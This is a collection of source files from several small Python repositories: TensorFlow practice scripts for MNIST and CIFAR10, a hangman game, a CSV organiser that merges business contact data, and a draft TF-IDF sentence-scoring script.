acc\n\ndef train(loss, global_step):\n num_batch = num_example_per_epoch_for_train / batch_size\n decay_step = int(num_batch*num_epoch_per_decay)\n lr = tf.train.exponential_decay(learing_rate,\n global_step,\n decay_step,\n learing_rate_decay,\n staircase=True)\n tf.summary.scalar('learning_rate', lr)\n train_step = tf.train.AdamOptimizer(lr).minimize(loss=loss, global_step=global_step)\n return train_step\n" }, { "alpha_fraction": 0.6276391744613647, "alphanum_fraction": 0.6295585632324219, "avg_line_length": 28, "blob_id": "41bfb219a75cb7b372e4d208e79a0d26f8a16438", "content_id": "ab3b49e863d53bfdd8d247c1d687ed387d164c8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 57, "num_lines": 18, "path": "/depth_train/csv_input.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport models\nimport cv2\nimport random\nimport glob, os\n\nfs = glob.glob(os.path.join('data_web', '*.jpg'))\ntrains = []\nfor i in range(len(fs)):\n image_name = os.path.join(\"data_web\", \"%d.jpg\" % (i))\n depth_name = os.path.join(\"data_web\", \"%d.png\" % (i))\n trains.append((image_name, depth_name))\nrandom.shuffle(trains)\n\nwith open('train_web.csv', 'w') as output:\n for (image_name, depth_name) in trains:\n output.write(\"%s,%s\" % (image_name, depth_name))\n output.write(\"\\n\")" }, { "alpha_fraction": 0.5762457847595215, "alphanum_fraction": 0.6290745735168457, "avg_line_length": 33.675323486328125, "blob_id": "1b85511f45c3b2c92a277d7a8beb4820d10064be", "content_id": "45a42cc318f21707775247ba936de84f5a25089f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2669, "license_type": "no_license", "max_line_length": 147, "num_lines": 77, "path": "/LeNet5/Lenet5.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = 
input_data.read_data_sets('mnist', one_hot = True)\n\ndef weight_varibale(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape = shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef maxpool(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\ndef accuracy(v_x, v_y):\n global prediction\n pred = sess.run(prediction, feed_dict={x_data: v_x, keep_prob:1})\n correct = tf.equal(tf.argmax(pred, 1), tf.argmax(v_y, 1))\n acc = tf.reduce_mean(tf.cast(correct, tf.float32))\n result = sess.run(acc, feed_dict={x_data: v_x, y_data: v_y, keep_prob:1})\n return result\n\nx_data = tf.placeholder(tf.float32, shape = [None, 784])\ny_data = tf.placeholder(tf.float32, shape = [None, 10])\nkeep_prob = tf.placeholder(tf.float32)\nx_input = tf.reshape(x_data, [-1, 28, 28, 1])\n\n#conv1_layer\nw_conv1 = weight_varibale([5, 5, 1, 32])\nb_conv1 = bias_variable([32])\nconv1 = tf.nn.relu(conv2d(x_input, w_conv1) + b_conv1)\npool1 = maxpool(conv1) #14*14\n\n#conv2_layer\nw_conv2 = weight_varibale([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\nconv2 = tf.nn.relu(conv2d(pool1, w_conv2) + b_conv2)\npool2 = maxpool(conv2) #7*7\n\n#fc1_layer\nw_fc1 = weight_varibale([7*7*64, 1024])\nb_fc1 = bias_variable([1024])\nflat_fc1 = tf.reshape(pool2,[-1, 7*7*64])\nrelu_fc1 = tf.nn.relu(tf.matmul(flat_fc1, w_fc1) + b_fc1)\ndropout = tf.nn.dropout(relu_fc1, keep_prob)\n\n#fc2_layer\nw_fc2 = weight_varibale([1024, 10])\nb_fc2 = bias_variable([10])\nprediction = tf.nn.softmax(tf.matmul(dropout, w_fc2) + b_fc2)\n\n#loss\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_data * tf.log(prediction), reduction_indices=[1]))\n#train\ntrain = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n sess.run(init)\n for i in range(10001):\n batch_x, batch_y = mnist.train.next_batch(100)\n sess.run(train, feed_dict={x_data: batch_x, y_data: batch_y, keep_prob: 0.5})\n if i%50 == 0:\n print('step = %s, loss = %.3f, accuracy = %.3f' %(i,\n sess.run(cross_entropy, feed_dict={x_data: batch_x, y_data: batch_y, keep_prob:0.5}),\n accuracy(mnist.test.images, mnist.test.labels)))\n\n save_path = saver.save(sess, \"model/lenet.ckpt\")\n\nprint('Model Saved..')" }, { "alpha_fraction": 0.6792452931404114, "alphanum_fraction": 0.74842768907547, "avg_line_length": 18.875, "blob_id": "c5365b2b86b23e96266650b697b7350f4cf75e03", "content_id": "6b2bed04d74b22e959f4adc6e0f0e0ca86657edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 159, "license_type": "no_license", "max_line_length": 34, "num_lines": 8, "path": "/README.md", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "Tensorflow Practice\n1. MNIST train (Lenet5)\n2. CIFAR10 train (Alexnet)\n3. CIFAR10 train (Resnet)\n4. NYUv2 (or depth dataset) train \n5. 
YOLO\n\nAll in tensorflow\n" }, { "alpha_fraction": 0.5760430693626404, "alphanum_fraction": 0.5928667783737183, "avg_line_length": 29.32653045654297, "blob_id": "b298ff8dfb1a3a952aea9da05195cd7e33f0c4a7", "content_id": "b81fcd327f6c04d6ccbc30b63e12471b2c4f76bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 67, "num_lines": 49, "path": "/cifar10_Alexnet/cifar10_train.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport cifar10\nimport os\n\ntrain_dir = 'train'\nmax_step = 100000\n\ndef train():\n with tf.Graph().as_default():\n global_step = tf.train.get_or_create_global_step()\n images, labels = cifar10.distorted_inputs()\n logits = cifar10.inference(images, train = True)\n loss = cifar10.loss(logits, labels)\n accuracy = cifar10.accuracy(logits, labels)\n train_op = cifar10.train(loss, global_step)\n\n class _LoggerHook(tf.train.SessionRunHook):\n\n def begin(self):\n self._step = -1\n\n def before_run(self, run_context):\n self._step += 1\n return tf.train.SessionRunArgs([loss, accuracy])\n\n def after_run(self, run_context, run_values):\n if self._step % 10 == 0:\n loss_value, acc_value = run_values.results\n format_str = ('step %d, loss = %.2f, accuracy = %.2f ')\n print (format_str %(self._step, loss_value, acc_value))\n\n with tf.train.MonitoredTrainingSession(\n checkpoint_dir=train_dir,\n hooks=[tf.train.StopAtStepHook(last_step=max_step),\n tf.train.NanTensorHook(loss),\n _LoggerHook()],\n config=tf.ConfigProto(\n log_device_placement=False)) as mon_sess:\n while not mon_sess.should_stop():\n mon_sess.run(train_op)\n\ndef main(argv=None):\n if not os.path.exists(train_dir):\n os.mkdir(train_dir)\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n" } ]
10
GMutovin/hangman
https://github.com/GMutovin/hangman
4151d1f8de586d8edc175dac0715e20ceed5daf6
186900d0ef95542a79ae16d2c3f38b1a0de07118
ff0352076c42775f371a5132d457506f31966d1b
refs/heads/master
2022-12-12T23:01:44.957071
2020-09-15T18:27:37
2020-09-15T18:27:37
295,803,509
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5181876420974731, "alphanum_fraction": 0.5220165848731995, "avg_line_length": 32.36170196533203, "blob_id": "9e3c44c1898197d49f735244c374a38777afa783", "content_id": "fbc60add2ba0d54ba8aa5418920ea91cee18c6f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1567, "license_type": "permissive", "max_line_length": 117, "num_lines": 47, "path": "/Hangman_game.py", "repo_name": "GMutovin/hangman", "src_encoding": "UTF-8", "text": "print('H A N G M A N')\nuser_choice = input('Type \"play\" to play the game, \"exit\" to quit: ')\n\nimport random\n\nwords_list = ['python', 'java', 'kotlin', 'javascript']\nguess_word = random.choice(words_list)\nguess_word_list = list(\"-\" *(len(guess_word)))\n\ndef game():\n lives = 8\n tries_list = []\n while lives > 0:\n print()\n print(\"\".join(guess_word_list))\n user_try = input(\"Input a letter: \")\n print(lives)\n if \"\".join(guess_word_list) == guess_word:\n print(f\"You guessed the word {guess_word}!\")\n print(\"You survived!\")\n break\n\n if user_try.isascii() and user_try.islower():\n if len(user_try) > 1 or len(user_try) == 0:\n print(\"You should input a single letter\")\n elif user_try in tries_list:\n print(\"You already typed this letter\")\n else:\n if user_try not in set(guess_word):\n lives -= 1\n print(\"No such letter in the word\")\n tries_list.append(user_try)\n else:\n indices = [index for index, letter in enumerate(guess_word) if letter == user_try]\n for d in indices:\n guess_word_list[d] = user_try\n tries_list.append(user_try)\n else:\n print(\"You should input a single letter\" if len(user_try) > 1 else \"It is not an ASCII lowercase letter\")\n else:\n print('You are hanged!')\n\n\nif user_choice == 'play':\n game()\nelse:\n exit()" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 11.5, "blob_id": "73c0b4719b5cfb48ed99f4d338ba9b84bb055c69", "content_id": "b010f756fcd3f9d31d28b621ca51d8854fe5f84b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "permissive", "max_line_length": 14, "num_lines": 2, "path": "/README.md", "repo_name": "GMutovin/hangman", "src_encoding": "UTF-8", "text": "# hangman\nGame \"Hangman\"\n" } ]
2
Mal-Capone/data
https://github.com/Mal-Capone/data
11d6cbf0c36c2ecdfad40c4887ebf4ea89872822
b214ed73425dc7bdeaaac89e47133a7ae628f54d
eb5952c47b5a4b175971d8c6116862df48d3e008
refs/heads/main
2021-06-06T00:10:33.782401
2021-05-07T03:07:24
2021-05-07T03:07:24
136,309,777
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49513381719589233, "alphanum_fraction": 0.4987834692001343, "avg_line_length": 30.653846740722656, "blob_id": "c801508911802e6cb406bd7ced932cdbf51e2d37", "content_id": "4316d14142b4f41a764295d97448f4da9512ceea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "permissive", "max_line_length": 104, "num_lines": 26, "path": "/main3.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "# field names within files\nfrom main2 import get_files\nfrom config import data_dir\nimport csv\nimport json\n\nf = json.loads(open('data/fld.json','r').read())\n\nF\n\ndef fields():\n field_names = []\n for file in get_files(data_dir):\n try:\n with open(file,'r',encoding='latin1',errors='ignore') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if reader.line_num == 1:\n for c in row:\n col = c.lower().replace(\" \",\"_\")\n if not col == '' and not col.startswith(\"row\") and not col in field_names:\n field_names.append(col)\n print(f\"Finished File {file}\")\n except:\n continue\n return field_names" }, { "alpha_fraction": 0.5417780876159668, "alphanum_fraction": 0.5467914342880249, "avg_line_length": 30.17708396911621, "blob_id": "8525120d7c3509216e7bf4deea47ded205e28a3e", "content_id": "428afb27d54492925e30779413ef30d6fc447e7e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2992, "license_type": "permissive", "max_line_length": 125, "num_lines": 96, "path": "/main2.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import timeit\nimport csv\nimport os\nimport time\nfrom pathlib import Path, PurePath\nfrom dask import dataframe as dd\nfrom tqdm.contrib.concurrent import thread_map\nfrom lib.utils import timeit\nfrom xutils import printer as p\nimport config\nimport json\n\nglobal rows\nglobal file_headers\n\ndata_dir = config.data_dir\n\ndef get_files(base=data_dir):\n flist, dirs = [], []\n ext = ['.csv','.xlsx','.xls']\n for path, subdir, files in os.walk(base):\n for file in files:\n if Path(file).suffix in ext and file not in flist:\n flist.append(str(PurePath(path,file)))\n return flist\n\ndef load_rows(row):\n d = dict.copy(fld)\n try:\n for key in fld.keys():\n for header in file_headers:\n if key.lower().replace(\" \",\"_\") == header.lower().replace(\" \",\"_\"):\n index=file_headers.index(header)\n d[key]=row[index]\n continue\n d['sfx']=fi\n if d['email']:\n return d\n except:\n return None\n return None\n\ndef main():\n global file_headers\n global fi\n _row, _rows = [],[]\n count, total , i = 0, 0, 0\n for file in get_files(data_dir):\n i += 1\n fi = Path(file).name\n if file.endswith(\".csv\"):\n p.info(f\"Processing File {i}/{len(get_files(data_dir))}: {Path(file).name}\")\n with open(file, 'r', encoding='latin1') as csvfile:\n file_headers = csvfile.readlines()[0].lower().split(\",\")\n with open(file, 'r', encoding='latin1') as csvfile:\n file_rows = thread_map(load_rows,[r for r in csv.reader(csvfile) if r], max_workers=20, desc=f'reading data')\n data = [row for row in file_rows if row]\n count = len(data)\n total = total + count\n data_rows.append(data)\n p.ok(f\"Added : {count}/{len(file_rows)} Companies | Total Count: {total} records\")\n\n _row, _rows = [],[]\n _row = [key for key in Company.keys()]\n _rows.append(_row)\n fnum = 0\n dr = [r for r in data_rows if len(r)]\n for lst in dr:\n with open(f'data/test_{fnum}.csv','w',encoding='utf-8',newline='') as 
csvtt:\n for company in lst:\n _row = [v.strip().lower() if v else '' for k, v in company.items()]\n _rows.append(_row)\n csv.writer(csvtt).writerows(_rows)\n p.ok(f\"File created text_{fnum}.csv ({len(_rows)})\")\n _rows = []\n fnum += 1\n p.ok(f\"Process Complete Total: {len(_rows)}\")\n\n\ndef dump_rows(data):\n with open('data/test.csv', 'w', encoding='utf-8', newline='') as csvf:\n csv.writer(csvf).writerows(data)\n p.ok(\"Done\")\n\nif __name__ == '__main__':\n data_rows = []\n fld = json.loads(open('data/fld.json','r').read())\n fi = ''\n try:\n main()\n except KeyboardInterrupt as keyex:\n dump_rows(data_rows)\n exit(0)\n except Exception:\n dump_rows(data_rows)\n exit(0)" }, { "alpha_fraction": 0.5812696814537048, "alphanum_fraction": 0.5844214558601379, "avg_line_length": 32.149253845214844, "blob_id": "240b797da5b46e0df414ab0e8491334bf75871dc", "content_id": "d0e97dc72feba44179e64ef05df653f00a4ce32f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2221, "license_type": "permissive", "max_line_length": 90, "num_lines": 67, "path": "/xutils/printer.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "from colorama import Fore as _c\n\nyellow = _c.LIGHTYELLOW_EX\ngreen = _c.LIGHTGREEN_EX\nblue = _c.LIGHTBLUE_EX\nred = _c.LIGHTRED_EX\ncyan = _c.LIGHTCYAN_EX\nblack = _c.LIGHTBLACK_EX\nRESET = _c.RESET\n\ndef info(print_message, symbol='[i]', color=blue):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef exc(print_message, symbol='[!]', color=red):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef ok(print_message, symbol='[+]', color=green):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef txt(print_message, symbol='\\n\\t', color=cyan):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef cyan(print_message, symbol='[i]', color=cyan):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef blu(print_message, symbol='[i]', color=blue):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\ndef ask_yesno(question, symbol='[?]', color=_c.LIGHTBLUE_EX):\n question = question.strip(\"?\")\n if input(f'{color}{symbol} {question}? [n/y]:> {_c.RESET}').lower() in ['y','yes','']:\n return True\n else:\n return False\n\ndef ask_int(question, symbol='[?]', color=_c.LIGHTBLUE_EX):\n question = question.strip(\"?\")\n INT=None\n while not type(INT) is int:\n try:\n i = int(input(f\"{color}{symbol} {question}? 
[0-9]:> {_c.RESET}\"))\n if type(i) is int:\n return i\n except ValueError as ex:\n continue\n\ndef ask_str(question, symbol='[?]', color=_c.LIGHTBLUE_EX):\n question = question.strip(\"?\")\n STR=None\n while not type(STR) is str:\n try:\n i = str(input(f\"{color}{symbol} {question}?:> {_c.RESET}\"))\n if type(i) is str:\n return i\n except ValueError as ex:\n continue\n\ndef title(print_message, width=60, color=_c.LIGHTCYAN_EX):\n s = \"-\" * width\n if not print_message or print_message == '':\n print_message = \"EXAMPLE TITLE\"\n t = print_message.upper()\n start = int((width - len(t)) / 2)\n msg = \"\\n\" + s + '\\n' + \" \" * start + t + '\\n' + s\n return print(f'{color}{msg}{_c.RESET}')\n\ndef sep(width=60,color=_c.LIGHTCYAN_EX):\n return print(f'{\"-\" * width}')\n" }, { "alpha_fraction": 0.4749999940395355, "alphanum_fraction": 0.48500001430511475, "avg_line_length": 21.22222137451172, "blob_id": "c62b29b759d7db0584fa7ba77b8f36f4c53427be", "content_id": "afd53d8523b1a7bbdda7e63208a9fe90c5936d9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "permissive", "max_line_length": 58, "num_lines": 9, "path": "/lib/regex.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import re\n\ndef find_emails(text):\n regex = r'^(\\w|\\.|\\_|\\-)+[@](\\w|\\_|\\-|\\.)+[.]\\w{2,3}$'\n emailaddr = re.match(regex, text)\n if emailaddr:\n return True\n else:\n return False\n" }, { "alpha_fraction": 0.7567567825317383, "alphanum_fraction": 0.7837837934494019, "avg_line_length": 17.5, "blob_id": "7f0af26f85b383cfee4bec76578df262261d899b", "content_id": "7019f7e20105f1412e0ecf4de9a17001b631f0c7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 37, "license_type": "permissive", "max_line_length": 19, "num_lines": 2, "path": "/README.md", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "# data_organiser\n B2B Data Organiser\n" }, { "alpha_fraction": 0.636734664440155, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 23.549999237060547, "blob_id": "1a4842841c3234632acfda6d287f8192f114fa8f", "content_id": "e728bccc92ee7169c034a6688f01fcce0c6f6265", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 490, "license_type": "permissive", "max_line_length": 67, "num_lines": 20, "path": "/lib/utils.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nimport tempfile\nfrom pathlib import Path\nfrom pyprind import ProgBar\n\ndef progressbar(iters=1, heading=\"Working...\"):\n bar = ProgBar(iterations=iters,title=heading)\n bar.stream = sys.stderr\n return bar\n\ndef timeit(method):\n def timed(*args, **kcommitw):\n ts = time.time()\n pq = method(*args, **kcommitw)\n te = time.time()\n print('[i] Excecution Timer : {:2.2f} sec'.format(te - ts))\n return pq\n return timed" }, { "alpha_fraction": 0.5207782983779907, "alphanum_fraction": 0.5255038142204285, "avg_line_length": 36.83684158325195, "blob_id": "b07e85263f57bc8dcb47f0d2ad5c0b4e72b29d9b", "content_id": "3cbe7dd58dd72d77f4c5c459221c2f0329399cec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7195, "license_type": "permissive", "max_line_length": 199, "num_lines": 190, "path": "/main.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import os\nimport csv\nimport 
re\nimport codecs\nfrom xutils import printer as p\nfrom pathlib import Path, PurePath\nfrom tqdm.contrib.concurrent import thread_map\nfrom dask import dataframe as dd\n\nglobal hdrs\nhdrs = []\n\nclass Company:\n #\n # def __init__(self, raw_data=None, company_name=None, company_postocde=None, company_no=None,\n # website=None, primary_email=None, postcode=None, name=None, phone_number=None,\n # source_headers=None):\n\n def __init__(self, raw_data=None, company_name=None, company_no=None, website=None, postcode=None,\n phone_number=None, source_headers=None):\n\n\n self.raw = raw_data\n self.source_headers = source_headers if source_headers else []\n\n self.indx = {}\n self.dict = {}\n self.company_name = company_name if company_name else ''\n self.company_no = company_no if company_no else ''\n self.phone = phone_number if phone_number else ''\n self.postcode = postcode if postcode else ''\n self.website = website if website else ''\n self.website_score = 0\n self.emails = ''\n self.twitter = ''\n self.facebook = ''\n\n # Companies House Info\n self.ch_url = None\n self.status = None\n self.reg_number = company_no if company_no else ''\n self.reg_addr = None\n self.build()\n\n def build(self):\n email_pattern = r\"\\\"?([-a-zA-Z0-9.`?{}]+@\\w+\\.\\w+)\\\"?\"\n if self.source_headers:\n for header in self.source_headers:\n self.indx[ self.source_headers.index(header)] = header\n for index, value in self.indx.items():\n value = value.lower()\n self.dict[value] = self.raw[index]\n if 'email' in value or re.search(email_pattern, value):\n email = self.raw[index]\n self.emails += email + \";\"\n self.website = f\"http://www.{str(email).lower().split('@')[1].strip()}/\"\n self.website_score = 10\n elif 'postcode' in value:\n self.postcode = self.raw[index]\n elif 'phone' in value or 'telephone' in value:\n self.phone = str(self.raw[index]).replace(\" \",\"\").replace(\"+44\",\"0\")\n self.phone = re.sub(\"^[0]\",\"+44\",self.phone,1)\n elif 'company_name' in value:\n self.company_name += self.raw[index] + \" \"\n elif 'company' in value:\n self.company_name = self.raw[index]\n elif 'website' in value:\n self.website = self.raw[index]\n self.website_score = 60\n\n def to_row(self):\n r = [self.company_name, self.emails, self.company_name, self.reg_number, self.postcode, str(self.phone).replace(\"+44\", \"0\"), self.website, self.website_score, self.twitter, self.facebook, '']\n return r\n\nclass Employee:\n\n def __init__(self):\n self.id = 0\n self.title = None\n self.forename = None\n self.surname = None\n self.email = None\n self.job_title = None\n self.company = None\n\ndef setup():\n os.makedirs('data/', exist_ok=True)\n company_file = 'data/companies.csv'\n company_headers = ['company_name','number','postcode','phone','email','website','website_score','twitter','facebook','reg_addr']\n\n with open(company_file,'w',newline='',encoding='utf-8') as file:\n csv.writer(file).writerow(company_headers)\n\n employee_file = 'data/employees.csv'\n employee_headers = [\"id\", \"compnay_id\", \"title\", \"forename\", \"surname\", \"email\", \"job_title\"]\n with open(employee_file,'w',newline='',encoding='utf-8') as file:\n csv.writer(file).writerow(employee_headers)\n\ndef get_files(base):\n flist, dirs = [], []\n ext = ['.csv','.xlsx','.xls']\n for path, subdir, files in os.walk(base):\n for file in files:\n if Path(file).suffix in ext and file not in flist:\n flist.append(str(PurePath(path,file)))\n return flist\n\ndef sve(row):\n try:\n comp = Company(raw_data=row, source_headers=hdrs)\n with 
open('data/companies4.csv', 'a', newline='') as f:\n csv.writer(f).writerow(comp.to_row())\n return comp\n except Exception as ex:\n return None\n\ndef extract(files):\n global hdrs\n companies, cmps, ite = [],[],[]\n for file in files:\n try:\n if Path(file).suffix == \".csv\":\n p.info(f\"Opening {Path(file).name}\")\n with codecs.open(file, 'r', encoding=\"UTF-8\") as csfile:\n reader = csv.reader(csfile)\n rows=[row for row in reader if row]\n hdrs = rows[0]\n n = thread_map(sve, rows, max_workers=50, desc='Doing')\n print(\"n cmpleyte\")\n #\n # for row in reader:\n # if row:\n # try:\n # if reader.line_num == 1:\n # hdrs = row\n # else:\n # comp = Company(raw_data=row, source_data=file, source_headers=hdrs)\n # p.ok(f\"Company Added {comp.emails}\")\n # companies.append(comp)\n # with open('data/companies3.csv','a',newline='') as f:\n # csv.writer(f).writerow(comp.to_row())\n # except Exception as ex:\n # p.exc(f\"Error handling {file} :{ex}\")\n # continue\n except Exception as ex:\n p.exc(f\"Error handling {file} :{ex}\")\n continue\n p.info(f\"Finished File: {Path(file).name} ({len(companies)})\")\n return companies\n\ndef get_rows(filepath):\n try:\n with open(filepath,'r',encoding='latni1',errors='ignore') as xf:\n reader = csv.reader(xf)\n rows = [row for row in reader if row]\n return rows\n except Exception as ex:\n return None\n\n\ndef read(r):\n try:\n file, head, row = r\n cmp = Company(raw_data=row,source_headers=head)\n return cmp\n except Exception as ex:\n p.exc(ex)\n return None\n\nif __name__ == '__main__':\n pass\n # headers = None\n # if not os.path.exists('data/companies.csv'):\n # setup()\n # file_list = get_files(\"d:\\B2B\\\\\")\n #\n # for _file in file_list:\n # get_rows(_file)\n # if Path(_file).suffix == '.csv':\n # with open(_file,'r',errors='ignnore',encoding=\"UTF-8\") as csvfile:\n\n\n #\n # p.info(f\"Total {len(company_list)} Found\")\n # row_data=['id','company_name','number','postcode','phone','email','website','website_score']\n # # n = thread_map(write, company_list, max_workers=40, desc=\"Writing data\")\n # # company_date = [i for i in n if i]\n # with open(\"data/companies2.csv\",'w',newline='') as csvfile:\n # for company in company_list:\n # csv.writer(csvfile).writerow(company.to_row())\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.590563178062439, "alphanum_fraction": 0.6035007834434509, "avg_line_length": 27.565217971801758, "blob_id": "1b2dc7f6a11c30643ab1340ce12f8d18a129a1b2", "content_id": "d6e7e2845a8650da90c9d362c747025eb9f4008f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1314, "license_type": "permissive", "max_line_length": 130, "num_lines": 46, "path": "/config.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n\nBASE_URL = 'http://download.companieshouse.gov.uk/'\nCH_BASE = 'http://download.companieshouse.gov.uk/'\nCH_HOME = 'http://download.companieshouse.gov.uk/en_output.html'\nCH_DATE = '2020-11-01'\nDB_DATE = '2019-10-01'\nDATA_PATH = 'downloads/ch'\nFILE_ROOT = 'BasicCompanyDataAsOneFile'\nFILE_NAME = 'BasicCompanyDataAsOneFile-{}.zip'\nCONN_FILE = './conn.info'\n\n\n\n# data organising\ndata_dir = 'e:/data/testing/'\ntemp_dir = './data/'\n\ndef get_connStr():\n if os.path.exists(CONN_FILE):\n with open(CONN_FILE, 'r') as file:\n c = \"\".join([line.strip() for line in file.readlines()])\n return c\n\nconn_str = fr'{get_connStr()}'\n\ndef 
get_companies_house_link():\n return (bs(requests.get(CH_HOME).content, 'lxml').find(\"a\",attrs={'href': re.compile(f\"{FILE_ROOT}*\")})).attrs.get(\"href\")\n\ndef web_tag():\n soup = bs(requests.get(CH_HOME).content, 'lxml')\n root = FILE_ROOT\n return soup.find(\"a\", attrs={'href': re.compile(f\"{root}*\")})\n\ntest_mode = True\n\n#==========================================================\n# SQL Alchemy Config\n#==========================================================\n\nfrom sqlalchemy import create_engine, event, exc\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n" } ]
8
foprel/tfidf-vectorizer
https://github.com/foprel/tfidf-vectorizer
a6c4518cc3c15c4722b27f7ac8e416dde8324c78
284adfa191064a0e8561de02075405bc82d3872a
bbef3bef6f8eedb3c7e10eb7534e00b40b1bd10e
refs/heads/master
2022-06-16T02:49:10.476196
2019-10-09T16:32:42
2019-10-09T16:32:42
213,967,161
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6168067455291748, "alphanum_fraction": 0.6210083961486816, "avg_line_length": 17.896825790405273, "blob_id": "7f0641d252b1cf7292f0b35e134b177ee38fc279", "content_id": "8a09b3717b533ad475f6f6b452af6016c03f87c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2380, "license_type": "no_license", "max_line_length": 72, "num_lines": 126, "path": "/word_count.py", "repo_name": "foprel/tfidf-vectorizer", "src_encoding": "UTF-8", "text": "import re\nfrom math import log\nimport os\nimport nltk\nnltk.download('punkt')\nfrom nltk import word_tokenize,sent_tokenize\n\ncorpus = \"\"\"\nThis is a sentence. This is another sentence. There are three sentences.\n\"\"\"\n\ndef preprocessing(doc):\n\n\tdoc = re.sub(\"\\n\", \" \", doc)\n\tdoc = re.sub(\"[^A-Za-z0-9]+\", \" \", doc)\n\tdoc = re.sub(\" +\", \" \", doc)\n\tdoc = doc.strip()\n\tdoc = doc.lower()\n\n\treturn(doc)\n\nsentences = sent_tokenize(corpus)\n\ndictionary = {}\n\nfor sentence in sentences:\n\tdictionary[sentence] = {}\n\nfor sentence in dictionary:\n\tsentence = preprocessing(sentence)\n\tterms = word_tokenize(sentence)\n\n\t# lemmatize/stem terms\n\t\n\tfor word_token in word_tokens:\n\t\tdictionary[sentence][word_token] = {}\n\nprint(dictionary)\n\n\n# Split original text to sentences and add to dict\n# Clean sentences, remove stopwords and split to list\n# Lemmatize/stem terms\n# Add words to dict\n# Calculate tfidf per word\n# Calculate tfidf-score per sentence\n# Calculate treshold score (e.g. average score per sentence)\n# Return all sentences above treshold\n\n\n# docs = []\n\n# for __, __, files in os.walk(os.getcwd(), topdown=False):\n# \tfor file in files:\n# \t\tif \".txt\" in file:\n# \t\t\tf = open(file, \"r\")\n# \t\t\tcontent = f.read()\n# \t\t\tdocs.append(content)\n\n\n\n# def tokenize(doc):\n\n# \tsentence = re.split('(?<!\\w\\.\\w.)(?<![A-Z][a-z]\\.)(?<=\\.|\\?)\\s', doc)\n\n# \treturn(tokenized_sentences)\n\n\n\n# def preprocessing(doc):\n\n# \tdoc = re.sub(\"\\n\", \" \", doc)\n# \tdoc = re.sub(\"[^A-Za-z0-9]+\", \" \", doc)\n# \tdoc = re.sub(\" +\", \" \", doc)\n# \tdoc = doc.strip()\n# \tdoc = doc.lower()\n\n# \treturn(doc)\n\n# tfidf = {}\n\n\n# def tf(terms):\n\n# \tfor term in terms:\n# \t\tif term not in tfidf:\n# \t\t\ttfidf[term] = {}\n# \t\t\ttfidf[term][\"termFrequency\"] = 1\n# \t\telif term in tfidf:\n# \t\t\ttfidf[term][\"termFrequency\"] += 1\n\n# \treturn\n\n# def df(terms, docs):\n\n# \tdoc_list = []\n\n# \tfor doc 